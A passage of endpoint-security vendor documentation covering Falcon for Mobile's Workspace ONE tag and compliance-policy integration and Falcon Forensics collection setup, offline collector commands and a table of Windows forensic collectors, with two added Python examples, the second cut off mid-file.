  • Lock screen not set, with a severity of low.

In this case, the tag with a severity of critical is assigned to the device.

Any time detection tags are added to or removed from a device, Falcon reevaluates all existing detections and determines if a new severity applies. Falcon instructs Workspace ONE to add or remove the appropriate detection tag and if needed, apply a different severity tag.
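The tag rules in this section, modelled as an added example (not CrowdStrike code) so the reevaluation can be checked against a known device state: each enabled, active detection contributes one CRWD_ detection tag, exactly one CRWD_Severity* tag is derived from the highest severity among them, and a disabled trigger contributes nothing, so its detection tag drops off at the next reevaluation. The trigger names LockScreenNotSet and DebuggableFlagTurnedOn appear in this guide; RootAccessDetected is a constructed name standing in for the "root access detected" case above.

```python
"""Detection and severity tag derivation for a Falcon for Mobile / Workspace ONE
device. Added example, not CrowdStrike code; trigger names are illustrative."""
from typing import Dict, Set, Tuple

TAG_PREFIX = "CRWD_"
# Higher rank wins when a device carries several detection tags.
SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}


def detection_tag(trigger: str) -> str:
    """Detection tag name for a remediation trigger, e.g. CRWD_LockScreenNotSet."""
    return TAG_PREFIX + trigger


def severity_tag(severity: str) -> str:
    """Severity tag name, e.g. "high" -> CRWD_SeverityHigh."""
    return f"{TAG_PREFIX}Severity{severity.capitalize()}"


SEVERITY_TAGS = {severity_tag(s) for s in SEVERITY_RANK}


def desired_tags(active_detections: Set[str],
                 triggers: Dict[str, Tuple[bool, str]]) -> Set[str]:
    """Tags a device should carry given its active detections.

    triggers maps trigger name -> (enabled, severity) from the mobile policy.
    Disabled (or unknown) triggers contribute no tag. At most one severity tag
    is emitted: the highest severity among the enabled, active detections.
    """
    tags: Set[str] = set()
    highest = None
    for trigger in active_detections:
        enabled, severity = triggers.get(trigger, (False, "low"))
        if not enabled:
            continue
        tags.add(detection_tag(trigger))
        if highest is None or SEVERITY_RANK[severity] > SEVERITY_RANK[highest]:
            highest = severity
    if highest is not None:
        tags.add(severity_tag(highest))
    return tags


def reconcile(current: Set[str], desired: Set[str]) -> Tuple[Set[str], Set[str]]:
    """(tags to add, tags to remove) to move a device from current to desired.

    Only CRWD_ tags are managed; tags set by other sources in Workspace ONE
    are left untouched.
    """
    managed = {t for t in current if t.startswith(TAG_PREFIX)}
    return desired - managed, managed - desired


def matches_rule(device_tags: Set[str], rule_tags: Set[str]) -> bool:
    """A 'Device tags / Contains Any' compliance policy rule."""
    return bool(device_tags & rule_tags)
```

`reconcile` is the check worth running when tags in Workspace ONE look stale: the add/remove sets it returns are exactly what Falcon should have applied after the last reevaluation, and a non-empty difference points at a disabled trigger, a changed organization group, or a tag edited by hand.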

Deleting tags from Workspace ONE

If you disable a specific remediation trigger in a mobile policy, the related detection tag in Workspace ONE is removed from devices belonging to that policy.

If you change the organization group for this integration, Falcon removes the current tags in Workspace ONE and re-creates the tags under the new organization. If you disable remediation triggers, you have the option to keep or remove tags from Workspace ONE. For more info, see Disable or delete the integration.

Viewing tags

View the list of CrowdStrike tags in Workspace ONE.

  1. In Workspace ONE, go to Groups & Settings > All Settings.

  2. In the Device & Users area, select Advanced > Tags.

    Navigating to the Tags page in Workspace ONE

  3. If needed, select the appropriate organization from the menu.

    Viewing tags in Workspace ONE

Using compliance policies

Compliance policies in Workspace ONE determine what remediation actions to apply when devices are potentially compromised. Compliance policies are made up of rules, actions, and assignments. Rules and assignments specify which devices are affected by the policy. Actions specify what happens when a device matches the rule and assignment criteria of the policy. Actions can include sending a notification or applying a profile that restricts usage of certain apps.

Using tags in compliance policy rules

Workspace ONE uses rules in compliance policies to determine the conditions for when a compliance policy should be applied to specified devices. For this integration, you must configure at least one rule with the Device tags criteria and specify one or more of the integration tags prefixed with CRWD_.

For example, if you want to apply the compliance policy whenever a device’s lock screen isn’t set, use CRWD_LockScreenNotSet. Or if you want to apply the policy if a device triggers a critical detection, use CRWD_SeverityCritical.

Create a compliance policy
  1. In Workspace ONE, go to Security > Compliance Policies > List View.

  2. Click Add.

  3. Select the mobile device platform.

  4. Configure one or more rules to trigger when the policy is applied. You must configure at least one rule with the Device tags criteria and specify one or more of the integration tags prefixed with CRWD_.

  5. Click Next.

  6. Configure the action to take, such as sending a notification or applying a more restrictive profile to the device.

  7. Click Next.

  8. Configure the Assignment area.

    1. From the Managed By menu, select the organization.

    2. In the Smart Groups field, enter or select groups to apply the policy to.

      Tip: If all devices in your environment are protected by Falcon for Mobile, and you want to assign all devices to this policy, select the organization group you used to set up the integration. You can also create smart groups in Workspace ONE for more control and granularity over which devices a policy can apply to.
    3. If needed, configure groups to be excluded.

    4. Click Next.

  9. Enter a name and description for the compliance policy.

  10. Click Finish & Activate.

If a device is assigned a tag belonging to any smart groups referenced in the compliance policy, the configured action is taken and the device is marked in Workspace ONE as noncompliant.

Manage the Workspace ONE integration

You can edit integration credentials or remediation settings, or disable the integration.

Edit Workspace ONE credentials

If your Workspace ONE credentials change, you must update them in Falcon.

  1. In the Falcon console, go to Endpoint security > Configure > Mobile policies.

  2. Click MDM connected.

    The Mobile policies page

  3. Click Edit your MDM credentials.

    The CrowdStrike Store opens.

  4. Select your MDM.

  5. Click Configure.

  6. Modify settings as needed and click Save configuration.

Edit the Workspace ONE organization group in Falcon

If needed, you can change the Workspace ONE organization group.

Note: You must select a group without children. For more info, see Selecting the Workspace ONE organization group.
  1. In the Falcon console, go to Endpoint security > Configure > Mobile policies.

  2. Click Remediation triggers enabled.

    The Mobile policies page

  3. Select the Organization Group and then click Save settings.

Disable or delete the integration

If you need to pause remediation triggers, you can disable the integration. If you no longer want to integrate with Workspace ONE, you can disable and then delete the integration.

When disabling, you have the option to remove all tags in Workspace ONE. For more info about tags, see How Workspace ONE uses tags to identify devices.

  1. In the Falcon console, go to Endpoint security > Configure > Mobile policies.

  2. Click Remediation triggers enabled.

    The Mobile policies page

  3. Turn off Send remediation triggers to MDM.

  4. If needed, select Remove all CrowdStrike tags from MDM.

  5. Click Save Settings.

  6. To delete the integration:

    1. On the Mobile policies page, click MDM connected.

      The Mobile policies page

    2. Click Delete settings.

View non-compliant devices in Workspace ONE

If a device triggers a detection and a compliance policy is applied to it, the device appears in Workspace ONE as non-compliant.

  1. In Workspace ONE, go to Devices > List View.

  2. Click the Compliance Status column to sort by compliance status.

    Devices that have triggered a remediation action will have 2 or more tags prefixed with CRWD_.

    The list of non-compliant devices in Workspace ONE

  3. Click a row to view device info.

    The details of a non-compliant device in Workspace ONE

View detections in the Falcon console

All Falcon for Mobile detections, including detections associated with remediation triggers, appear in Endpoint security > Monitor > Mobile detections.

Use case: Restricting Android app access on devices without a lock screen

If one of your protected devices doesn’t have a lock screen set, you might want to send a notification and restrict access to certain apps in case the device is lost or stolen. You might also want to increase the default trigger severity from low to high.

Step 1: Configure the remediation trigger in Falcon
  1. Go to Endpoint security > Configure > Mobile policies.

  2. Find the policy to configure and click Edit Policy.

  3. Click the Remediation triggers tab.

  4. Click the LockScreenNotSet trigger.

  5. In the Details panel, click Edit remediation trigger.

  6. Make sure the trigger status is On.

  7. From the Severity menu, select High.

  8. Click Update setting.
Step 2: Create an Android profile with app restrictions
  1. In Workspace ONE, go to Resources > Profiles & Baselines > Profiles.

  2. Click Add > Add Profile.

  3. Select Android.

  4. Enter a name for the profile.

  5. Locate the Restrictions entry and click Add.

  6. Scroll down to Application and disable apps such as the camera or Chrome.

  7. Click Next.

  8. Click Save & Publish.

Step 3: Create a compliance policy
  1. In Workspace ONE, go to Devices > Compliance Policies > List View.

  2. Click Add and select Android.

  3. Configure a rule to apply to all devices.

    1. From the first menu, select Device tags.

    2. From the second menu, select Contains Any.

    3. From the third menu, select CRWD_LockScreenNotSet.

  4. Click Next.

  5. Configure the notification action.

    1. From the first menu, select Notify.

    2. Use the other menus to configure how and where you’d like the notifications sent.

  6. Configure the profile action.

    1. Click the add icon.

    2. From the first menu, select Profile.

    3. From the second menu, select Install Compliance Profile.

    4. In the Profile Name field, enter the name of the Android profile you created.

  7. Click Next.

  8. Configure the Assignment area.

    1. From the Managed By menu, select the organization.

    2. In the Smart Groups field, select the group that contains devices protected by Falcon for Mobile.

    3. Click Next.

  9. Enter a name and description for the compliance policy.

  10. Click Finish & Activate.

Falcon Forensics

Collect forensic data to use in incident response investigation and threat hunting.

Falcon Forensics for Windows, Mac, and Linux

Learn how to deploy Falcon Forensics. Discover the different data types that can be collected.

Overview

Falcon Forensics lets you collect forensic triage data from workstations and servers within your environment. You can use the collected forensic data to perform incident response investigations, compromise assessments, and threat hunting.

Requirements

Requires all of these subscriptions:

  • Falcon Insight XDR

  • Falcon Forensics

System requirements:

  • Windows

    • Windows XP SP2 and newer

    • Windows Server 2003 and newer

    • 2 GB of available disk space
  • macOS

    • 10.13 High Sierra

    • 10.14 Mojave

    • 10.15 Catalina

    • 11 Big Sur

    • 12 Monterey

    • 13 Ventura

    • 14 Sonoma

    • 15 Sequoia

    • 26 Tahoe

  • Linux x64

    • Ubuntu LTS 14/18/20

    • CentOS 6/7/8

    • RHEL 6/7/8

  • A workstation computer with PowerShell 5.1 or newer is required for leveraging PSFalcon for deployment. PowerShell is available for Mac and is described on the official PowerShell GitHub page.

  • Linux kernels

    • Kernel 3.2.0 and later are supported

    • Kernel 2.6.32 and earlier are not supported

      Note: Kernel versions between 2.6.32 and 3.2.0 might produce varying results.

Sensor:

The Falcon sensor is not required to use Falcon Forensics. There are specific features that require the Falcon sensor. Falcon Forensics is compatible with all supported Falcon sensor versions.

Roles:

View collections, configurations, collectors, and the Forensics app in Falcon console:

  • Forensic Investigator

Download the Forensics app from Falcon console:

  • Endpoint Manager

  • Falcon Administrator

  • Falcon Analyst

  • Falcon Analyst: Read Only

  • Falcon Investigator

  • Falcon Security Lead

Create and edit configurations:

  • Forensics Configuration Manager

Create and edit collections. Deploy and shut down collectors:

  • Forensics Queue Manager

For more information about roles, see Roles for Falcon Forensics.

Network connection:

A network connection to the Forensics cloud endpoints is required. For a list of endpoints, see Falcon Forensics.

For more requirements, see Plan to deploy Falcon Forensics.

Understand Falcon Forensics

CrowdStrike Falcon Forensics collects a snapshot of forensic triage data after it executes on each system. The collector then uploads the snapshot of forensic triage data to the CrowdStrike cloud. That data is available for analysis in the Falcon console for 30 days. If you need more than 30 days, you can download the data using Falcon Data Replicator (FDR).

Tip: In this guide, when you are asked to input your "CID with checksum", this means the CID and the CID's checksum.

Configuration

A configuration is a collection profile that contains settings and specifies one or more collectors.

For more info about configurations, see Create a configuration.

Collector

A collector is a set of instructions that collects artifacts and file metadata defined in the collector options. After you create a configuration, you can run a collector in a collection.

For a detailed list of all collectors, see Falcon Forensics Collectors.

Collection

A collection is a set of forensic collections defined in a configuration, against a set of target machines.

For more info about collections, see Create a collection.

Collection ID

Collection ID is a unique identifier of a collection performed on a host.

Audit logs

There are audit logs for create, delete, and update actions related to the Forensic API collection and configuration endpoints. Go to Audit logs > Audit logs > API.

How the Falcon Forensics executable works

When using a default configuration template (and not opted in to customizable collections): Falcon Forensics scans the system and uploads a stream of collected system metadata to the CrowdStrike cloud. It runs the default configuration template for the specified platform and then exits.

When using a user-created configuration (after opt in): The executable will first connect to the CrowdStrike cloud and then wait for a configuration to be sent to it from a collection. This allows for tailored data collection based on your needs.

Work with collections and configurations

Falcon Forensics collections allow you to define and collect specific artifacts that may not be included in default collection templates. You can reduce data collection size by targeting only the most relevant artifacts for an investigation, instead of running a full system collection.

Customizable collections enhance forensic investigations by providing precise control over data collection while maintaining the speed and reliability of Falcon Forensics.

If you are a new Falcon Forensics customer, you can start creating collections and configurations immediately. Existing customers must choose to opt-in to use customizable collections.

There are many potential use cases for custom collections and configurations.

  • You need to collect unique file types or paths.

  • You want a narrow and focused investigation.

  • Your investigation is time-critical and full collections aren't necessary.

Create a collection

Create a new collection in the Falcon console:

  1. Go to Endpoint security > Forensics > Forensics Collections.

  2. Click Create collection.

  3. If you have not opted in to customizable collections, a notification appears. Type OPT-IN into the text box, and then click Opt-in.

  4. Add Collection Tag information, or keep the default text. Tags allow you to group collections in Falcon console, Forensics dashboards, and Advanced Event Search.

  5. Set a Deadline if you want to set a date and time after which the collection will not run.

  6. Set Priority if you want to create multiple collections, where some run before others based on priority ranking.

  7. You must define at least one Collection target. There are several options you can use.

    1. Sensor hosts: Click Add filters. Click an item and add a value. For example, click Host ID, and add the ID.

    2. Known hosts: Select from a dropdown of hosts where the Falcon Forensics Collector has run previously. Provides both Agent IDs (AIDs) and Falcon For Cloud IDs (FFCIDs).

    3. Manual entry Agent IDs (AIDs): Manually input AIDs to target, one per line.

    4. Manual entry Falcon For Cloud IDs (FFCIDs): Manually input FFCIDs to target, one per line.

  8. Set Configurations. Define which configuration gets pushed to collection targets. You must select one for each platform, even if you are not running a collection on that platform; if none of the targeted AIDs or FFCIDs belong to a platform, the collection does not run there. This allows multi-platform collections to be performed.

Create a configuration

Configurations gather specific artifacts on Windows, Mac, and Linux platforms. You can define exactly what is collected and how many records are collected, which lets you build smaller, faster, and more efficient configurations, for example one that only collects browser events from the last 5 days.

Create a new configuration in the Falcon console:

  1. Go to Endpoint security > Forensics > Forensics Collections.

  2. Click the Manage configurations button.

  3. Click New configuration to start from a blank configuration or you can select an existing configuration and click Duplicate.

  4. Enter a Name for your configuration.

  5. Optional. Add a Description to differentiate your configuration from existing ones.

  6. Choose a Platform:

    • Windows

    • Linux

    • Mac

  7. Optional. Self destruct will delete the executable and any output files created from running the configuration. If you want to run multiple collections, do not turn on Self destruct until your last configuration. This will prevent having to repeatedly execute the collector.

  8. Optional. Select Advanced options:

    • Locale ID: Sets a Windows Language Code. For example: en-US is 0x0409.

    • Disk space: Checks available disk space before executing a collection. A collection does not run if there is less than the set amount of disk space. The collector does not write much data to the drive as it takes a streaming approach.

    • Maximum CPU percentage: Sets CPU priority to idle and limits maximum CPU usage (1-99%). Set to 0 for idle priority with no usage limit.

    • Low IO: Sets a delay after each file operation to reduce disk IO load.

  9. If you started with a blank configuration, click Create. This allows you to add collectors to the configuration. If you duplicated an existing configuration, you can add collectors at any time.

  10. Click Add Collector.

  11. Select a collector from the list. You can add multiples of the same collector, as long as you give them unique Names. Configurations can have as few or as many collectors as you need.

  12. Click Add to add the collector to the configuration list. Repeat this process until your configuration is complete.

Manage configurations

Configurations can be modified to adjust their collection parameters and limitations, thereby aligning them with evolving requirements. You do not need to create new configurations each time. You can duplicate existing configurations to suit specific needs. A configuration can be designated as the default for your environment by selecting it and then clicking Set as default. Replacing the default configuration means that newly created collections use this configuration, instead of the pre-defined Default Template.

Manage your configurations in the Falcon console:

  1. Go to Endpoint security > Forensics > Forensics Collections.

  2. Click Manage Configurations.

  3. Click an existing configuration.

  4. CrowdStrike-owned configurations: You can Set as default or Duplicate. You cannot modify these templates.

  5. User-created configurations: You can Set as default, Duplicate, or Delete. You can also edit configuration settings and collectors.

    • Modifications to collectors are saved automatically as collectors are added or changed. However, if you change the configuration Settings in the center pane, you must click Save.

View status of collections
  1. Go to Endpoint security > Forensics > Forensics Collections.

  2. On this page you will see the Collection Tag for all performed collections.

Use data from offline or legacy collections

To gain visibility into data from air-gapped hosts or Windows devices with deprecated operating systems, run collections in offline mode or on legacy operating systems and then submit the collections to the CrowdStrike cloud.

Run an offline collection on an air-gapped device

Note: At this time, offline collections can only run the default configuration and cannot be used with user-created configurations.

For an air-gapped device with a version of Windows, Mac, or Linux that CrowdStrike supports, run an offline collection using one of these commands. Replace <CID with Checksum> with your CID and the CID's checksum.

  • Windows, as Administrator:

    FalconForensicsCollectorWindows<Cloud>.exe -cid <CID with Checksum> -offline
  • Mac and Linux:

    sudo ./FalconForensicsCollectorLinux<Cloud> -cid <CID with Checksum> -offline
Tip: To capture browser events, specify -offline-browser instead of -offline when you run an offline collection.

These collectors produce a file within an upload_bucket folder in the current directory.

Note: If the collector was deployed in Windows using RTR, the resulting .fcx file can be found in system32.

Logs are stored in these locations:

  • Windows: C:\crowdstrike

  • Mac and Linux: /opt/CrowdStrike

These file logs provide the collection ID for an offline collection. This collection ID is required to track events.

Run a legacy collection on an unsupported device

For a device with a Windows version that CrowdStrike no longer supports, run a legacy collection.

  1. Download the legacy collector.

    FalconForensicsCollectorLegacyOS.exe
  2. Run the collector as Administrator, specifying the CID.

    FalconForensicsCollectorLegacyOS.exe -cid <CID with Checksum>

    Windows limits the number of characters in a file path to 260. To stay within this limit, launch the Falcon Forensics Collector near the root folder, for example from a folder one level below the root: C:\FFC\FalconForensicsCollectorLegacyOS.exe.

    The collector produces a file with a .ffc extension in the current folder.

  3. Copy the collection to a host that has a connection to the CrowdStrike cloud.

Run an offline collection with a custom configuration

For an air-gapped device with a version of Windows, Mac, or Linux that CrowdStrike supports, run an offline collection with a custom configuration using the following commands. Replace <CID with Checksum> with your CID and the CID's checksum. You must pull the configuration from the configuration-download endpoint. The file has an .fcxconfig extension.

For more info, see Falcon Forensics APIs.

Do the following:

  • Windows, as Administrator:

    FalconForensicsCollectorWindows<Cloud>.exe -cid <CID with Checksum> -offline-config <path to config>

  • Mac and Linux:

    sudo ./FalconForensicsCollectorLinux<Cloud> -cid <CID with Checksum> -offline-config <path to config>

These collectors produce a file within an upload_bucket folder in the current directory.

Note: If the collector was deployed in Windows using Real Time Response, the resulting .fcx file can be found in system32.

Logs are stored in these locations:

  • Windows: C:\crowdstrike

  • Mac and Linux: /opt/CrowdStrike

These file logs provide the collection ID for an offline collection. This collection ID is required to track events.

Submit collections to the CrowdStrike cloud

These parameters are required when submitting collections:

  • All file names must be unique.

  • A valid CID is required to upload an offline collection file.

These guidelines may help when submitting collections:

  • Use a matching cloud executable for each upload. For example, use a US-1 binary to upload a US-1 package and a US-2 binary for a US-2 package.

  • You can submit a collection for a CID from a system on another CID, if both CIDs are on the same CrowdStrike cloud.
    Note: The offline collection’s CID takes precedence for searching purposes.

To submit an offline or legacy file to the CrowdStrike cloud, run one of these commands:

  • Windows:

    path\to\ffc.exe -cid <CID with Checksum> -file <path_to_file>

  • Mac and Linux:

    sudo ./ffc -cid <CID with Checksum> -file <path_to_file>

Falcon Forensics delivered through Falcon Data Replicator

To deliver your Falcon Forensics events into an S3 bucket, use Falcon Data Replicator. For instructions about setting up your credentials and accessing Falcon Forensics events, see Falcon Data Replicator.

Work with the Unix-like Artifacts Collector (UAC)

Falcon Forensics supports previously unsupported Unix operating systems using the Unix-like Artifacts Collector (UAC). UAC is a Live Response collection script for Incident Response. For more information about UAC, see the official UAC Documentation.

Set up the UAC binary

The UAC must be downloaded and launched from your system to start gathering collections.

  1. Download the UAC binary from GitHub.

    Unix-like Artifacts Collector (UAC)

  2. Uncompress the file, and then launch it.

Gather a collection using the UAC

When using UAC, the examiner flag must be used. In order for the data to be routed to your instance, you must input your CID and the CID's checksum. For example:

./uac -p full --examiner <CID with Checksum> /tmp

This command runs the full profile and puts the resulting tar.gz file in the /tmp directory. You can also choose which specific artifacts are collected. You can upload the tar.gz file to the cloud if the --examiner field is filled in. The file is uploaded the same way as an offline collection. For example:

Mac/Linux

sudo <path to ffc> -cid <CID with Checksum> -file <path to UAC archive>

Windows

From administrator command prompt or RTR:

 -cid <CID with Checksum> -file <path to UAC archive>

Send data to a parent from a child CID

Run collections on a child CID of a parent CID and view the data of all child CIDs from a parent CID in Advanced event search.

These are the requirements to send data to a parent from a child CID.

  • The parent CID must have a Falcon Forensics subscription
  • A child CID must already be set up as a child CID of the parent CID to which you’d like to send the child CID’s Forensics collection
  • Valid CIDs for both the child and parent CIDs

To send data from a child CID to a parent CID and aggregate its Falcon Forensics Collector data with the parent CID’s data, open a terminal session on a host in the child CID and run the following command, replacing <child CID> with the child CID and <parent CID> with the parent CID.

Mac and Linux

sudo ./ffc -cid <child CID> -dest-cid <parent CID>

Windows

ffc.exe -cid <child CID> -dest-cid <parent CID>

To view data from a specific child CID, run a query in Advanced event search (Endpoint security > Forensics > Advanced event search) from the parent CID and filter on the ForensicsOriginCustomerId field. ForensicsOriginCustomerId is present in every forensics event sent from a child CID on which users have added -dest-cid.

Collected forensics data: Default template

Falcon Forensics collects the following forensic triage data when you use default collection templates for Windows, Mac, and Linux.

Windows

| Collector | Data collected | Event generated | Limitations |
| --- | --- | --- | --- |
| Amcache | Amcache registry hive entry, which contains metadata related to Windows Portable Executable binary image (PE) execution and program installation. | AmcacheEntry - Metadata related to PE execution and program installation on Windows 7 and Server 2008 R2 and above. | Files above 20MB are not hashed. |
| BAM | Gathers Background Activity Moderator (BAM) registry entry. | BamRegAppRunTime - Recent program execution timeline from the Background Activity Moderator (BAM) system service registry. The BAM key is written on system shutdown. RecentExecutionTimestamp - Recent execution timestamp from a Forensics artifact. | None |
| Browser | Gathers Windows browser artifacts. | BrowserCookieInfo - Browser tracking cookie information. BrowserDownloadStart - Browser downloaded file information signifying download start time. BrowserDownloadEnd - Browser downloaded file information signifying download end time. BrowserExtensionInfo - Browser extension/addon information. BrowserHistoryVisit - Information about a browser history entry. | 1,000 events |
| DataStore | Processes Windows Update history stored in the DataStore.edb file. | OsUpdateTimestamp - Details about an operating system update. | None |
| Defender | Pulls Defender threat and detection details and generates MpThreat, MpThreatDetection, and Dirlist-related events for the detected threat file. | MpThreat - Microsoft Protection Threat, information about the threat identified by Defender. MpThreatDetection - A detection from Microsoft Protection, also known as Defender. | None |
| Dirlist | Generates a list of files and sub-directories. | FileInfo - Details about the file. FileTimestampMetadata - File time event per timestamp for a given file, used to build a timeline of creation, access, and modification of a file. SignInfo - Information about the signing state of an image. | 500,000 for non-portable executables; files above 5MB are not hashed. 100,000 for portable executables; files above 20MB are not hashed. |
| Drivers | Provides information about driver files. | DriverLoad - Notifies of a driver load. | Files above 20MB are not hashed. |
| Drives | Generates a list of all disks and the FsVolumeMounted event. | FsVolumeMounted - Information about a volume that was just mounted. | None |
| Env | Collects information about all system variables and current user variables. | RuntimeEnvironmentVariable - In the context of Falcon Forensics, this is an environment variable provided to the collector process itself. | None |
| Events | Collects Windows event logs. | LogEntry - Information about a log entry observed on an endpoint. | 5,000 per event log source. 1,825 day limit. |
| FeatureUsage | Collects Feature Usage registry keys, per user. | RegFeatureUsageInfo - Information about Feature Usage registry keys; contains details per user and last login/last write timestamps. This is collected alongside Dirlist-related events. | None |
| Files | Summarizes all files on a system drive and collects all of this information into a FilesStatisticInfo event. | FilesStatisticInfo - Contains information about a file statistic. It is a much less noisy version of Dirlist events and is meant to give complementary information. | None |
| Firewall | Shows information about the Windows host-based firewall rules. | FirewallRuleInfo - Contains information about firewall rules created on the host. | None |
| Groups | Shows information about all user groups in the system. | LocalGroupIdentity - Group identity information, including user group name, GID, names, UIDs, and SIDs of user members. | None |
| Handles | Shows information for each entry in a process handle table referencing a kernel object. | ProcessHandleTableEntry - Information about an entry in the process handle table that references a kernel object. | None |
| Jobs | Shows all atjobs in use. | AtJobInfo - Windows atjobs in use. | None |
| Jumplist | Shows information from the Jumplist, which lists recently opened files. | JumpListInfo - Jumplist file information. | None |
| Link | Gives information for each link file and its target file. The target file can be found using Dirlist-related events. | LinkFileInfo - Collects file metadata about link files. | Files above 5MB are not hashed. |
| LogFile | Collects warning and error log events. | FileEntry - Text version of warning and error events. | None |
| Magic | Collects information about files within the file system that have fake extensions, such as a DOIUV file extension, but whose byte signature belongs to a PE file. | FileSignatureMismatch - On-demand scan for files whose name extensions and header magic values do not match. | Portable executables only. Files above 20MB are not hashed. |
| Mal | Gives information about malicious DLL files that have identical base names but different SHA256 hashes, as MalPaths events. | MalPaths - Malicious DLL or executable image name conflicts found in different or unexpected folders. | None |
| Master File Table (MFT) | Collects information about deleted MFT file records. | MftBootSector - Windows Master File Table (MFT) boot sector. MftRecord - Windows Master File Table (MFT) record. | Limited to files created in the last 365 days. |
| Network | Collects network information for several different parts of the system, including IPv4 and IPv6 events. | IPv4: LocalIpAddressIP4 - IPv4 address on the machine; NetworkListenIP4 - IPv4 network listen event; NetworkReceiveAcceptIP4 - IPv4 network SYN event; NetworkConnectIP4 - IPv4 network connect event; NetworkCloseIP4 - IPv4 network close event; RouteIP4 - IPv4 route entry. IPv6: LocalIpAddressIP6 - IPv6 address on the machine; NetworkListenIP6 - IPv6 network listen event; NetworkReceiveAcceptIP6 - IPv6 network SYN event; NetworkConnectIP6 - IPv6 network connect event; NetworkCloseIP6 - IPv6 network close event; RouteIP6 - IPv6 route entry. DNS: DnsServer - DNS server IP addresses; NetworkDnsSuffix - A network suffix name in the configured DNS suffix list; DnsCache - DNS cache entry. ARP: NeighborListIP4 - An entry in the ARP table; NeighborListIP6 - An entry in the ARP table. Hosts file: NetworkHostsFileEntry - A hostname entry in the network hosts file. | None |
| PCA | Collects information about application launch entries in Program Compatibility Assistant. | PcaAppLaunchEntry - An application launch entry in the Windows Program Compatibility Assistant (PCA) file PcaAppLaunchDic.txt. PcaGeneralDbEntry - An application launch entry in the Windows Program Compatibility Assistant (PCA) database PcaGeneralDb[0-9]+.txt. | None |
| PEInfo | Collects Portable Executable (PE) header information into PeHeaderInfo and Dirlist-related events for the PE file. | PeHeaderInfo - Portable Executable header information from a Windows executable. PeHeaderOptionalInfo - Portable Executable optional header information from a Windows executable. PeSectionInfo - Windows Portable Executable (PE) section information. | None |
| Pipes | Collects information about named pipes. | NamedPipe - Information about a named pipe. | None |
| Prefetch | Extracts information from PF files and Layout.ini files. | PrefetchFile - Prefetch or Layout file; records the 8 most recent execution times of a Windows application. | None |
| PSList | Shows currently running processes as ProcessRollup2 events. | ProcessRollup2 - Returns information about a running process. UserName is the owner of the process. | Files above 20MB are not hashed. |
| Recentfiles | Collects entries in the RecentFileCache.bcf. This is only used in Windows 7 collections. | The events emitted are part of the Dirlist events. | Files above 20MB are not hashed. |
| Recycle | Collects files found in the Recycle Bin. | FileDeleted - File entry and details in the Recycle Bin. | None |
| Regdump | Collects information about registry entries. | RegGenericInfo - Generic information about a registry entry. | Max entry size: 1MB |
| RegFile | Transforms file references in the registry into RegGenericInfo events and Dirlist-related events. | RegGenericInfo - Generic information about a registry entry, as well as Dirlist events. | None |
| SDB | Collects each tag entry in the Shim Database (SDB). | ShimDbTag - Tag entry in the Shim Database. | None |
| Services | Collects information about running services. | ServicesStatusInfo - Detailed information and status of a Windows service. | Files above 20MB are not hashed. |
| Shares | Collects information about network shares. | NetShareInfo - Information about a shared resource. | None |
| Shellbag | Collects information for each entry in the Shellbag MRU registry hive. | ShellBagInfo - Windows ShellBag MRU registry entry. ShellBagFileTimestampMetadata - An event is emitted per timestamp from a ShellBag registry entry. | None |
| Shim | Collects information for each Application Compatibility (Shim) Cache registry entry module. | RegShimCache - Shim cache registry entry. | Files above 20MB are not hashed. |
| SRUM | Collects details about system resource usage by each user process in the Application Resource table of the System Resource Usage Monitor database. Also collects network resources, data usage, and the resource usage timeline. | SruApplicationResourceUsage - System Resource Utilization Monitor: application resource usage per user. SruNetworkDataUsage - System Resource Utilization Monitor: bytes sent/received per local network interface, application, and user tuple. SruApplicationTimelineProvider - System Resource Utilization Monitor: application resource usage timeline. SruNetworkConnectivityUsage - System Resource Utilization Monitor: connection time per local network interface, application, and user tuple. | None |
| StartupInfo | Collects information about each process started during the first 90 seconds of bootup from StartupInfo XML files. | AutoRunProcessInfo - Describes a process that was automatically executed. | None |
| Superfetch | Collects information from AgForegroundAppHistory.db and each application's running schedule/period from AgGlobalHistory.db. | SuperfetchAppInfo - Application entry from Windows Superfetch AgForegroundAppHistory.db. SuperfetchAppSchedule - Application running schedule/period recently updated from Windows Superfetch AgGlobalHistory.db. | None |
| Syscache | Collects information about the Syscache registry hive. | SyscacheEntry - Information about an entry in the Windows Syscache hive. | None |
| System (Main and Log modules) | The following events are related to the running of Falcon Forensics on Windows devices. | ForensicsCollectorOnline - Marks the beginning of a Forensics collection. ForensicsCollectorOffline - Final event of a Forensics collection. ForensicsCollectorLog - A log entry emitted by the Falcon Forensics Collector process. | None |
| Tasks | Collects information for each scheduled task. | ScheduledTaskInfo - Scheduled Windows tasks. | None |
| Timeline | Collects information from the Windows Timeline feature. | WindowsTimelineEntry - Information about an entry in the Windows Timeline feature. WindowsTimelineEntryTimestamp - Timestamp event related to the activity timestamp type. | None |
| UAL | Collects information about per-user access log entries for a service role and IP address pair in the CLIENTS table of the UAL database on Windows servers. | UserAccessLogEntry - Per-user access log information for the year for a service role and IP address pair on Windows servers. | None |
| USB | Collects information for each USB storage device attached to the system. | UsbDeviceInfo - Information about each USB storage device attachment. | None |
| UserAssist | Collects information about each application launched through a user-assisted GUI menu. | UserAssistAppLaunchInfo - Information about an application launched through a user-assisted GUI menu. | |
| Users | Collects information about user accounts on the host. | UserIdentity - Provides information about a security principal identified by the UserSid field. | None |
| USN Journal | Collects information within the USN Journal. | USNRecord - Information about an entry in the USN Journal. | By default the USN Journal is only analyzed for 60s. |
| Webshell | Collects probability and statistics indicating whether a scanned file is a WebShell. | WebShellDetected - To identify WebShell script files in a target folder, the content of each text file is matched against a large built-in list of regular expressions. | Minimum size to be considered a webshell: 64 bytes. The collector grabs the first 256 bytes of a file. |
| WMIQuery | Collects information from the Windows Management Instrumentation (WMI) query status. | WmiQuery - Windows Management Instrumentation (WMI) query status. | None |
| WLAN | Collects information on Wireless LAN interfaces. | WlanInterfaceInfo - Contains information about the wireless LAN interface. | None |
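The Magic collector above reports files whose extension does not match their header bytes, and only for portable executables. The following is an added illustration of that check and is not Falcon Forensics code: it walks a directory, tests for an MZ header whose e_lfanew points at a PE signature, flags PE images stored under a non-PE extension, and skips hashing for files over the 20MB limit the table states. The set of "expected" PE extensions, the 4096-byte header read, and the sample files created in a temporary directory are assumptions constructed for the example.

```python
"""Extension/magic mismatch check in the spirit of the FileSignatureMismatch event.
Added illustration, not part of Falcon Forensics."""
import hashlib
import os
import struct
import tempfile
from dataclasses import dataclass
from typing import List, Optional

# Mirrors the "files above 20MB are not hashed" limitation from the table.
HASH_LIMIT_BYTES = 20 * 1024 * 1024
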